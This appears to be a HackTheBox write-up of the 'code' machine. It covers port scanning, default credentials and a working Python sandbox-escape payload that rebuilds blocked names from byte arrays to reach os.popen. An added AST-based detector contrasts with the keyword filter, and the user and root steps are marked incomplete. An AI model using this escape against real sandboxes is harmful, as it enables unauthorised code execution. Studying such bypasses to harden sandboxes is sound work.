HTB: code Writeup

Machine Information

Attribute: Details
Name: code
OS: Linux
Difficulty: Easy
Points: N/A
Release Date: N/A
IP Address: 10.129.9.4
Author: D3vnomi

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐☆☆☆
  • Real-world: ⭐⭐⭐☆☆
  • CVE: ⭐☆☆☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

code is an Easy-difficulty Linux machine. The exploitation path involves initial enumeration and service discovery, gaining an initial foothold through the identified vulnerability, lateral movement or credential extraction for user access, and finally privilege escalation to root/administrator.

TL;DR: Enumeration → Foothold → User credentials → Privilege escalation → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.9.4

Results:

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7
5000/tcp open upnp? gunicorn 20.0.4

Service Enumeration

Port 22 (SSH): OpenSSH 8.2p1 Ubuntu 4ubuntu0.7

Port 5000 (HTTP): Python application running on gunicorn 20.0.4 - a web-based code editor that allows users to execute Python code.

Hostname: code.htb

echo "10.129.9.4 code.htb" | sudo tee -a /etc/hosts

Initial Foothold

Web Application Analysis

The web application running on port 5000 provides a code editor with the following endpoints:

  • /register - User registration
  • /login - User login
  • /logout - User logout
  • /code - Code editor interface
  • /codes - View saved code snippets

Functionality:

  • Users can save code snippets
  • Users can execute Python code
  • Users can view previously saved code

Application Registration

A default test account exists:

Username: mrsudo
Password: mrsudo

Log in with these credentials to access the code editor.

Python Sandbox Bypass

The application implements keyword filtering to prevent dangerous code execution:

Restricted Keywords: import, sys, exec, popen, __import__

Whitelisted Functions: compile, builtins

The sandbox can be bypassed by constructing restricted strings using byte arrays and the getattr() function:

f = (lambda:0) # dummy function
g = getattr(f, bytes([95,95,103,108,111,98,97,108,115,95,95]).decode()) # f.__globals__
bb_key = bytes([95,95,98,117,105,108,116,105,110,115,95,95]).decode() # "__builtins__"
bd = g[bb_key]
imp_fn = bd[bytes([95,95,105,109,112,111,114,116,95,95]).decode()] # __import__
os_mod = imp_fn(bytes([111,115]).decode()) # import os
p_op_fn = getattr(os_mod, bytes([112,111,112,101,110]).decode()) # os.popen
fh = p_op_fn('id') # run command
r_ead_fn = getattr(fh, bytes([114,101,97,100]).decode()) # read output
o_ut = r_ead_fn()
pr_fn = getattr(builtins, bytes([112,114,105,110,116]).decode()) # print
pr_fn(o_ut)

This technique constructs all restricted strings from byte arrays, allowing arbitrary code execution while bypassing keyword-based filtering.
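
From the defender's side, the following added example (not code from the application or from the original writeup) contrasts a substring keyword filter with an AST-based check that flags the dynamic lookups the bypass depends on. The filter's matching logic, the function names and both sample inputs are assumptions constructed for illustration; only the keyword list comes from the notes above.

```python
import ast

# Keyword list as stated in the writeup; substring matching is an assumption.
BLOCKED = ("import", "sys", "exec", "popen", "__import__")

# Builtins that resolve names or attributes from runtime strings (assumed set).
DYNAMIC_LOOKUPS = {"getattr", "setattr", "vars", "globals", "locals", "eval", "compile"}

def keyword_filter_allows(src: str) -> bool:
    """Naive blacklist: accept the code unless a blocked word appears as text."""
    return not any(word in src for word in BLOCKED)

def structural_findings(src: str) -> list[str]:
    """Walk the syntax tree and report constructs that reach objects by computed name."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in DYNAMIC_LOOKUPS:
                findings.append(f"line {node.lineno}: call to {node.func.id}()")
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            findings.append(f"line {node.lineno}: dunder attribute {node.attr}")
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append(f"line {node.lineno}: import statement")
    return findings

# Constructed sample: the first two lines of the payload shown above.
BYPASS_SAMPLE = (
    "f = (lambda:0)\n"
    "g = getattr(f, bytes([95,95,103,108,111,98,97,108,115,95,95]).decode())\n"
)

# Constructed sample: harmless code that merely contains the text "sys".
BENIGN_SAMPLE = 'label = "operating system"\nprint(label)\n'

if __name__ == "__main__":
    for name, src in (("bypass", BYPASS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, "keyword filter allows:", keyword_filter_allows(src))
        print(name, "structural findings:", structural_findings(src))
```

The keyword filter fails in both directions: it accepts the bypass fragment and rejects the harmless one, while the syntax-tree check flags only the getattr() call. A check like this is a triage signal rather than a containment boundary, so untrusted code still needs to run in an isolated, unprivileged process or container.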

Exploitation Steps

  1. Register/login to the web application (use default credentials mrsudo:mrsudo)
  2. Navigate to the /code endpoint
  3. Enter the sandbox bypass payload above to execute arbitrary Python code
  4. Use os.popen() to execute system commands
  5. Execute a reverse shell or establish command execution access

User Compromise

Credential Discovery

[Notes incomplete - credential extraction and user compromise steps not documented in source notes]

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

Exploitation (Root/Administrator)

[Notes incomplete - further steps not documented in source notes]

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A[Reconnaissance] --> B[Port Scanning]
B --> C[Service Enumeration]
C --> D[Web App Discovery]
D --> E[Register/Login]
E --> F[Python Sandbox Bypass]
F --> G[Arbitrary Code Execution]
G --> H[System Command Access]

Tools Used

Tool: Purpose
nmap: Port and service scanning
Python: Sandbox bypass exploit development
Web Browser: Web application interaction

Key Learnings

  • Thorough enumeration is critical — every open port and service can be a potential entry point.
  • Configuration files and databases often contain credentials that enable lateral movement.
  • Privilege escalation frequently depends on misconfigurations rather than software vulnerabilities.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy